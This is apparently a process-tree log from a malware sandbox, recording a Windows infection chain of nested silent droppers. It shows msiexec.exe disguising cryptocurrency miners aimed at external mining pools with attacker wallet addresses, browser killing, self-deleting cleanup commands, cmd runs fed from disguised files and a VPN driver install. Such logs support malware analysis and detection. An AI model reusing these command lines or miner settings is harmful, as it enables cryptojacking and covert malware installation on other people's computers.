C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:1056
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:3592
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"9⤵PID:7664
-
C:\Users\Admin\AppData\Roaming\60C4.tmp.exe"C:\Users\Admin\AppData\Roaming\60C4.tmp.exe"10⤵PID:6584
-
C:\Users\Admin\AppData\Roaming\60C4.tmp.exe"C:\Users\Admin\AppData\Roaming\60C4.tmp.exe"11⤵PID:8332
-
-
-
C:\Users\Admin\AppData\Roaming\68B6.tmp.exe"C:\Users\Admin\AppData\Roaming\68B6.tmp.exe"10⤵PID:7380
-
-
C:\Users\Admin\AppData\Roaming\674D.tmp.exe"C:\Users\Admin\AppData\Roaming\674D.tmp.exe"10⤵PID:5728
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:9100
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:6420
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"10⤵PID:5268
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:2244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"9⤵PID:3928
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oplp2h32.v33\Four.exe & exit7⤵PID:6848
-
C:\Users\Admin\AppData\Local\Temp\oplp2h32.v33\Four.exeC:\Users\Admin\AppData\Local\Temp\oplp2h32.v33\Four.exe8⤵PID:7028
-
C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:5748
-
C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe" 1 3.1617397124.60678584a6d26 10410⤵PID:7800
-
C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe" 2 3.1617397124.60678584a6d2611⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\2sx2ffyyj3b\gps0xbsqs4r.exe"C:\Users\Admin\AppData\Local\Temp\2sx2ffyyj3b\gps0xbsqs4r.exe" /ustwo INSTALL12⤵PID:8540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 65613⤵
- Program crash
PID:7880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 66813⤵
- Program crash
PID:5716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 63613⤵
- Program crash
PID:5924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 68013⤵
- Program crash
PID:6100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 75213⤵
- Program crash
PID:7968
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 89613⤵
- Program crash
PID:8592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 98013⤵
- Program crash
PID:8920
-
-
-
C:\Users\Admin\AppData\Local\Temp\ewycsiwzyye\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ewycsiwzyye\cpyrix.exe" /VERYSILENT12⤵PID:8716
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe13⤵PID:7896
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe13⤵PID:5932
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"14⤵PID:8376
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub14⤵PID:5212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fzne1brd2zj\vpn.exe"C:\Users\Admin\AppData\Local\Temp\fzne1brd2zj\vpn.exe" /silent /subid=48212⤵PID:9176
-
C:\Users\Admin\AppData\Local\Temp\is-UIMKO.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-UIMKO.tmp\vpn.tmp" /SL5="$90212,15170975,270336,C:\Users\Admin\AppData\Local\Temp\fzne1brd2zj\vpn.exe" /silent /subid=48213⤵PID:5920
-
-
-
C:\Users\Admin\AppData\Local\Temp\m2svrkc1ohn\vict.exe"C:\Users\Admin\AppData\Local\Temp\m2svrkc1ohn\vict.exe" /VERYSILENT /id=53512⤵PID:1884
-
C:\Users\Admin\AppData\Local\Temp\is-FHIV5.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-FHIV5.tmp\vict.tmp" /SL5="$20626,870426,780800,C:\Users\Admin\AppData\Local\Temp\m2svrkc1ohn\vict.exe" /VERYSILENT /id=53513⤵PID:2056
-
C:\Users\Admin\AppData\Local\Temp\is-EIM73.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-EIM73.tmp\win1host.exe" 53514⤵PID:9100
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\feicuyjhobg\app.exe"C:\Users\Admin\AppData\Local\Temp\feicuyjhobg\app.exe" /8-2312⤵PID:7792
-
-
C:\Users\Admin\AppData\Local\Temp\s5t30keusrw\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\s5t30keusrw\Setup3310.exe" /Verysilent /subid=57712⤵PID:8444
-
C:\Users\Admin\AppData\Local\Temp\is-I7THH.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-I7THH.tmp\Setup3310.tmp" /SL5="$4041A,138429,56832,C:\Users\Admin\AppData\Local\Temp\s5t30keusrw\Setup3310.exe" /Verysilent /subid=57713⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\is-22HEL.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-22HEL.tmp\Setup.exe" /Verysilent14⤵PID:4360
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Z1INLV8HSC\setups.exe"C:\Users\Admin\AppData\Local\Temp\Z1INLV8HSC\setups.exe" ll9⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\is-21IK5.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-21IK5.tmp\setups.tmp" /SL5="$60370,635399,250368,C:\Users\Admin\AppData\Local\Temp\Z1INLV8HSC\setups.exe" ll10⤵PID:7472
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"3⤵PID:6612
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:6164
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"3⤵PID:6604
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"4⤵PID:5900
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"5⤵PID:7812
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"6⤵PID:8012
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui6⤵PID:7884
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe7⤵PID:8108
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 5900 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"5⤵PID:3568
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 59006⤵
- Kills process with taskkill
PID:3260
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:6596
-
C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵PID:5988
-
C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe" 1 3.1617397026.6067852289565 1035⤵PID:4944
-
C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe" 2 3.1617397026.60678522895656⤵PID:3564
-
C:\Users\Admin\AppData\Local\Temp\3adum0a5jp1\vict.exe"C:\Users\Admin\AppData\Local\Temp\3adum0a5jp1\vict.exe" /VERYSILENT /id=5357⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\is-QLQOA.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-QLQOA.tmp\vict.tmp" /SL5="$8048E,870426,780800,C:\Users\Admin\AppData\Local\Temp\3adum0a5jp1\vict.exe" /VERYSILENT /id=5358⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\is-7PS0E.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-7PS0E.tmp\win1host.exe" 5359⤵PID:3408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3wbxksb4ef4\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\3wbxksb4ef4\Setup3310.exe" /Verysilent /subid=5777⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\is-HO2S5.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-HO2S5.tmp\Setup3310.tmp" /SL5="$304C2,138429,56832,C:\Users\Admin\AppData\Local\Temp\3wbxksb4ef4\Setup3310.exe" /Verysilent /subid=5778⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\is-T5GV7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-T5GV7.tmp\Setup.exe" /Verysilent9⤵PID:1536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ah2wr4tg53y\uy1ofrmpf02.exe"C:\Users\Admin\AppData\Local\Temp\ah2wr4tg53y\uy1ofrmpf02.exe" /ustwo INSTALL7⤵PID:4852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 6568⤵
- Program crash
PID:7480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 6848⤵
- Program crash
PID:7932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 7728⤵
- Program crash
PID:6952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 8208⤵
- Program crash
PID:7536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 8768⤵
- Program crash
PID:6068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 9248⤵
- Program crash
PID:7908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 9648⤵
- Program crash
PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\xiyky1qjza4\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\xiyky1qjza4\cpyrix.exe" /VERYSILENT7⤵PID:5616
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:3800
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"9⤵PID:6812
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:7236
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"9⤵PID:7768
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub9⤵PID:2148
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe10⤵PID:8048
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qwkcgqeoc05\app.exe"C:\Users\Admin\AppData\Local\Temp\qwkcgqeoc05\app.exe" /8-237⤵PID:5596
-
-
C:\Users\Admin\AppData\Local\Temp\cgkg01waarh\vpn.exe"C:\Users\Admin\AppData\Local\Temp\cgkg01waarh\vpn.exe" /silent /subid=4827⤵PID:980
-
C:\Users\Admin\AppData\Local\Temp\is-CP9JQ.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-CP9JQ.tmp\vpn.tmp" /SL5="$303DA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\cgkg01waarh\vpn.exe" /silent /subid=4828⤵PID:4840
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\545SBPPMO2\setups.exe"C:\Users\Admin\AppData\Local\Temp\545SBPPMO2\setups.exe" ll4⤵PID:6592
-
C:\Users\Admin\AppData\Local\Temp\is-T3NG4.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-T3NG4.tmp\setups.tmp" /SL5="$70154,635399,250368,C:\Users\Admin\AppData\Local\Temp\545SBPPMO2\setups.exe" ll5⤵PID:3492
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:6588
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:6580
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:7096
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵PID:6284
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:6572
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:4848
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵PID:6416
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:6472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 9124⤵
- Program crash
PID:6980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 10044⤵
- Program crash
PID:3656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 10604⤵
- Program crash
PID:2784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 11164⤵
- Program crash
PID:2952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 11444⤵
- Program crash
PID:8044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 11724⤵
- Program crash
PID:7840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 10804⤵
- Program crash
PID:3144
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 14524⤵
- Program crash
PID:4004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 15524⤵
- Program crash
PID:3384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 17084⤵
- Program crash
PID:9116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 16164⤵
- Program crash
PID:8384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 16044⤵
- Program crash
PID:8712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 18084⤵
- Program crash
PID:9152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 18004⤵
- Program crash
PID:8200
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3888
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4368
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5BD96105A33D813A8996B8074AA8100E C2⤵PID:5256
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 56EA09378B631AC8E28B1A36251A94C42⤵PID:6392
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:2460
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:1516
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6524
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6980
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4492
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5388
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7580
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8040
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7392
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6968
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7e2fb434-5d6f-124d-9f80-74346c1ed007}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:8044
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:4056
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:3464
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:5212
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\3651f731e5774df79922703a32eecd92 /t 2988 /p 29841⤵PID:5280
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:7984
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵PID:3428
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵PID:7628
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7264